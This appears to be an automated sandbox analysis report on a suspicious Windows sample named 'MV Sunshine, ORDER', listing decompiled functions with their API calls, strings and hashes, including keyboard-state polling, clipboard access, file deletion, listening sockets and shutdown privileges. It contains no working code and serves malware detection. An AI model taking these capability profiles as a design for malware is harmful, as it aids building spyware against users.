Opcode Fuzzy Hash: 373fc798cdf5576e2a04d77cf76b861ce73264c014cf1dc5d3bbcffe758a384e
Instruction Fuzzy Hash: 58E13B31204214AFCB14DF28D895E6ABBE4FF89754F04896DF48ADB2A2DB30E905CB51

Function 009E0219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 009E0241
GetAsyncKeyState.USER32(000000A0), ref: 009E02C2
GetKeyState.USER32(000000A0), ref: 009E02DD
GetAsyncKeyState.USER32(000000A1), ref: 009E02F7
GetKeyState.USER32(000000A1), ref: 009E030C
GetAsyncKeyState.USER32(00000011), ref: 009E0324
GetKeyState.USER32(00000011), ref: 009E0336
GetAsyncKeyState.USER32(00000012), ref: 009E034E
GetKeyState.USER32(00000012), ref: 009E0360
GetAsyncKeyState.USER32(0000005B), ref: 009E0378
GetKeyState.USER32(0000005B), ref: 009E038A

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2e5870f4c211f690ec7065c457b41a2759b1fd0d00d50f020f4ab702390dd0ad
Instruction ID: a77d35e189cbcb194062a1b0087539e45a157eb5204e5b9c9580b495cbc9a04b
Opcode Fuzzy Hash: 2e5870f4c211f690ec7065c457b41a2759b1fd0d00d50f020f4ab702390dd0ad
Instruction Fuzzy Hash: 4941EB245047CA6EFF338AA588083B5BEE87F91340F08509DD6C6566C2E7E55DC8C7A2

Function 009F86D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00989997: __itow.LIBCMT ref: 009899C2
Part of subcall function 00989997: __swprintf.LIBCMT ref: 00989A0C

CoInitialize.OLE32 ref: 009F8718
CoUninitialize.OLE32 ref: 009F8723
CoCreateInstance.OLE32(?,00000000,00000017,00A12BEC,?), ref: 009F8783
IIDFromString.OLE32(?,?), ref: 009F87F6
VariantInit.OLEAUT32(?), ref: 009F8890
VariantClear.OLEAUT32(?), ref: 009F88F1

Strings

NULL Pointer assignment, xrefs: 009F87C8
Invalid parameter, xrefs: 009F880F
Failed to create object, xrefs: 009F878E, 009F8844

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: 4830a9a829a12a3a3b638757169e44cad3faffc9a1453056ef060973d42217ec
Instruction ID: c715806debd47b1b4ca7aee2bf58df9659d22a17a0f4565f28ec034c2a5d90ee
Opcode Fuzzy Hash: 4830a9a829a12a3a3b638757169e44cad3faffc9a1453056ef060973d42217ec
Instruction Fuzzy Hash: CA61D130608305AFD750EF64C888B6FBBE8AF84754F14481DFA959B291CB34ED49CB92

Function 009F4458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 009F447F
EmptyClipboard.USER32 ref: 009F4485
GlobalAlloc.KERNEL32(00000002,?), ref: 009F449A
CloseClipboard.USER32 ref: 009F4539

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: fe3af6abf904224729df5073fae833bfb97aca297007daeb288c3d9b3add7465
Instruction ID: 81b511bc70b9a441670e49d8d8a5119dd274b3d2568d3a922139a9e9f275a04f
Opcode Fuzzy Hash: fe3af6abf904224729df5073fae833bfb97aca297007daeb288c3d9b3add7465
Instruction Fuzzy Hash: 2B21A3352002189FDB20EFA4EC49B7A77A8EF44710F148026F946EB271CB75AC02CB95

Function 009E3A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 009848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,009848A1,?,?,009837C0,?), ref: 009848CE

Part of subcall function 009E4CD3: GetFileAttributesW.KERNEL32(?,009E3947), ref: 009E4CD4

FindFirstFileW.KERNEL32(?,?), ref: 009E3ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 009E3B87
MoveFileW.KERNEL32(?,?), ref: 009E3B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 009E3BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 009E3BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 009E3BF5

Strings

\*.*, xrefs: 009E3A8A, 009E3A93, 009E3AA8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 1fbb9a521eda0cd644708e492faa66fd23da97aa4c9f118a28bea7e4e459cf49
Instruction ID: 71e29a96e6e4710b73bb2361f4635626d1531be319f75bc8d1df1bef372999c4
Opcode Fuzzy Hash: 1fbb9a521eda0cd644708e492faa66fd23da97aa4c9f118a28bea7e4e459cf49
Instruction Fuzzy Hash: 5C51403180514D9ACF16FBE1CD96AEDB7B8AF54300F644165E44277191DF219F09CB51

Function 009EF65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 009EF6AB
Sleep.KERNEL32(0000000A), ref: 009EF6DB
_wcscmp.LIBCMT ref: 009EF6EF
_wcscmp.LIBCMT ref: 009EF70A
FindNextFileW.KERNEL32(?,?), ref: 009EF7A8
FindClose.KERNEL32(00000000), ref: 009EF7BE

Strings

*.*, xrefs: 009EF690

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: a5dffddc377f70f08dc0c3542b07c547c6b338773f2ccf5ad8c3056cc7b95298
Instruction ID: 5634fe396c13fe81233d00d56becb5746ff522c22460564aef3244777fd3ca95
Opcode Fuzzy Hash: a5dffddc377f70f08dc0c3542b07c547c6b338773f2ccf5ad8c3056cc7b95298
Instruction Fuzzy Hash: 1941907190025EAFCF15EFA5CC99AEEBBB8FF05310F144566E814A22A1DB319E45CB90

Function 00994140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON

Download Yara Rule

Strings

VUUU, xrefs: 009944DB
ERCP, xrefs: 0099421F
VUUU, xrefs: 009944ED
VUUU, xrefs: 009C7B0C
VUUU, xrefs: 00994520

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID:
String ID: ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-1546025612
Opcode ID: 3f015cfb9bf2d716467a9f60f02ce3d18e928934452fc7b8ca5ca99c162dbc75
Instruction ID: 023ba210d1d8b4b148596c00677f41770845be23fe37af463d44fce71d5d35a0
Opcode Fuzzy Hash: 3f015cfb9bf2d716467a9f60f02ce3d18e928934452fc7b8ca5ca99c162dbc75
Instruction Fuzzy Hash: B0A27F70E0421ACBDF25CF9CC990BAEB7B5BF54314F1485AAD85AA7280D7349E82CF51

Function 009958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00995A05
_memmove.LIBCMT ref: 00995A55
_memmove.LIBCMT ref: 00995ABB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 108029f702f66448ea600d7888c11a5f763405074f99261e481d3481301b0f81
Instruction ID: d4fd0fa1b6313323728222d3208498b19eac5afe05409d22958abc71f5a8bac2
Opcode Fuzzy Hash: 108029f702f66448ea600d7888c11a5f763405074f99261e481d3481301b0f81
Instruction Fuzzy Hash: D0127970A00609EFDF14DFA9D985AAEB7B5FF88300F10856AE406A7251EB35AD11CB60

Function 009E545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 009D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009D8D0D
Part of subcall function 009D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009D8D3A
Part of subcall function 009D8CC3: GetLastError.KERNEL32 ref: 009D8D47

ExitWindowsEx.USER32(?,00000000), ref: 009E549B

Strings

SeShutdownPrivilege, xrefs: 009E546B
@, xrefs: 009E548E
, xrefs: 009E5489

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: f2ea9ec758092caa727f827684205347ae2e873125beb6a5cadd03228bf43fc9
Instruction ID: bf59e505c4b4cf0c5a9da8eb57888a84ff509390bda694bc32057c4c575309b5
Opcode Fuzzy Hash: f2ea9ec758092caa727f827684205347ae2e873125beb6a5cadd03228bf43fc9
Instruction Fuzzy Hash: D1014731694A596EF73A6776DC4ABBB725CEB04746F220421FC06E20E3FA541C818290

Function 009F6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009F65EF
WSAGetLastError.WSOCK32(00000000), ref: 009F65FE
bind.WSOCK32(00000000,?,00000010), ref: 009F661A
listen.WSOCK32(00000000,00000005), ref: 009F6629
WSAGetLastError.WSOCK32(00000000), ref: 009F6643
closesocket.WSOCK32(00000000,00000000), ref: 009F6657

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: dccf73b3eb2a6f62b72f1cdb83e147f397cdad68fb28bac1bd1f6e48da4e141f
Instruction ID: a93eedcec929be666d80ac8162c9c815cc87f7e9cc83fc4e9d076149dddc4e15
Opcode Fuzzy Hash: dccf73b3eb2a6f62b72f1cdb83e147f397cdad68fb28bac1bd1f6e48da4e141f
Instruction Fuzzy Hash: AD217E316002089FCB10EF64C989B7EB7A9EF85720F148559EA5AE73D1CB70AD06CB51

Function 00995680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON

Download Yara Rule

APIs

Part of subcall function 009A0FF6: std::exception::exception.LIBCMT ref: 009A102C
Part of subcall function 009A0FF6: __CxxThrowException@8.LIBCMT ref: 009A1041

_memmove.LIBCMT ref: 009D062F
_memmove.LIBCMT ref: 009D0744
_memmove.LIBCMT ref: 009D07EB

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: _memmove$Exception@8Throwstd::exception::exception
String ID:
API String ID: 1300846289-0
Opcode ID: 65f677b582c5bb8199f2f7b13fad6c7715e68ad909a64cb41c6b3fb5f5eb56b1
Instruction ID: a6b47a6cf5ca1183088ffb7fa8a9cd9a27b769f0efe04e2a0ab1dd3605f3b155
Opcode Fuzzy Hash: 65f677b582c5bb8199f2f7b13fad6c7715e68ad909a64cb41c6b3fb5f5eb56b1
Instruction Fuzzy Hash: B5028FB0A00209DBDF04DF69D981BAEBBB5FF84300F15806AE806DB355EB35DA51CB91

Function 00981287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00982612: GetWindowLongW.USER32(?,000000EB), ref: 00982623

DefDlgProcW.USER32(?,?,?,?,?), ref: 009819FA
GetSysColor.USER32(0000000F), ref: 00981A4E
SetBkColor.GDI32(?,00000000), ref: 00981A61

Part of subcall function 00981290: DefDlgProcW.USER32(?,00000020,?), ref: 009812D8

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: f6274b1d1daedbe0e766fcf031f1486a74adfe44a0d72e31ce0b7f4d38bacc21
Instruction ID: 45d0900b2d303e1ff0a6a0b984d2c374abea05b26541faaf8c77f5f76a69f900
Opcode Fuzzy Hash: f6274b1d1daedbe0e766fcf031f1486a74adfe44a0d72e31ce0b7f4d38bacc21
Instruction Fuzzy Hash: 4AA15971101558FAD73CFB68ED94EBF399CDB82361B14061AF442D63E2CA598D0393B2

Function 009F6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 009F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 009F80CB

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 009F6AB1
WSAGetLastError.WSOCK32(00000000), ref: 009F6ADA
bind.WSOCK32(00000000,?,00000010), ref: 009F6B13
WSAGetLastError.WSOCK32(00000000), ref: 009F6B20
closesocket.WSOCK32(00000000,00000000), ref: 009F6B34

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: fba32b2f481aab411187f4fe2d37adeb38f43c9f56c984135ea9c98ee829196c
Instruction ID: 2d784e2b42e86fa2cb06942d88f0bcfd9488645c4f9373bdd807420e6434b5f8
Opcode Fuzzy Hash: fba32b2f481aab411187f4fe2d37adeb38f43c9f56c984135ea9c98ee829196c
Instruction Fuzzy Hash: 9E41C275700214AFEB10BF68DC86F7E77A89B84720F44805CFA5AAB3D2DA709D018791

Function 00A055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 00A0564C
IsWindowEnabled.USER32 ref: 00A0565A
GetForegroundWindow.USER32(?,?,00000001), ref: 00A05667
IsIconic.USER32 ref: 00A05675
IsZoomed.USER32 ref: 00A05683

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 4fc15beed16a676875f7af1188b283c1651b3a7d593151461d8a2cfa4fad1bcb
Instruction ID: f60ba9912b21a854beccf6854d4e5bf799cf4478b3f1e0ab22ca24924f0e4095
Opcode Fuzzy Hash: 4fc15beed16a676875f7af1188b283c1651b3a7d593151461d8a2cfa4fad1bcb
Instruction Fuzzy Hash: 1711C831B009185FD7216F76EC44B2FB79DEF84721F484429F806E7281CB329902CE95

Function 009FC304 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009C1D88,?), ref: 009FC312
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 009FC324

Strings

kernel32.dll, xrefs: 009FC30D
GetSystemWow64DirectoryW, xrefs: 009FC31E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 9fcc598dd4bb3fa0f794ecb7c80201ae5d1187cd82cf81d184c4e38af255b648
Instruction ID: de3f977dedcdccab347870e0f3d1d411498ad31a9452aa9ac727c69c6f4ebe62
Opcode Fuzzy Hash: 9fcc598dd4bb3fa0f794ecb7c80201ae5d1187cd82cf81d184c4e38af255b648
Instruction Fuzzy Hash: 3DE086B420030BDFCB348B65D904A9676D8FB09394B80C439E685D2550D7B0D441CB60

Function 00993190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: e0f03fe8e512f2e44f82b7d5d711c07510f9f53da24ab926252de18d738d47e0
Instruction ID: f49f0b66026756bcc8aaf187cada07f09bc1e93229c12bbdb7441676417c678a
Opcode Fuzzy Hash: e0f03fe8e512f2e44f82b7d5d711c07510f9f53da24ab926252de18d738d47e0
Instruction Fuzzy Hash: 0E2279715083019FDB24EF68C881B6FB7E4AF88714F15891DF89A97391DB35EA04CB92

Function 009FF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 009FF151
Process32FirstW.KERNEL32(00000000,?), ref: 009FF15F

Part of subcall function 00987F41: _memmove.LIBCMT ref: 00987F82

Process32NextW.KERNEL32(00000000,?), ref: 009FF21F
CloseHandle.KERNEL32(00000000,?,?,?), ref: 009FF22E

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 4ce0f06bf7d54e1847a710f7f5fe39349c2f91395be6413b85220f155aa91622
Instruction ID: 0810d0eda2ffba37cd49bda789e7b1d1da50d6a4e55b30861ea5739ec386a3ef
Opcode Fuzzy Hash: 4ce0f06bf7d54e1847a710f7f5fe39349c2f91395be6413b85220f155aa91622
Instruction Fuzzy Hash: F5517B71508304AFD310EF24DC85F6BB7E8AF94710F14492DF596972A1EB70E909CB92

Function 009E40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009E40D1
_memset.LIBCMT ref: 009E40F2
DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009E4144
CloseHandle.KERNEL32(00000000), ref: 009E414D

Memory Dump Source

Source File: 00000000.00000002.1691487335.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1691473549.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691569155.0000000000A3F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1691703583.0000000000A48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_MV Sunshine, ORDER.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle_memset
String ID:
API String ID: 1157408455-0
Opcode ID: 663b20538433731f71b525e92ade84ef0084eed1476ff8b158b82957c0d5a75b
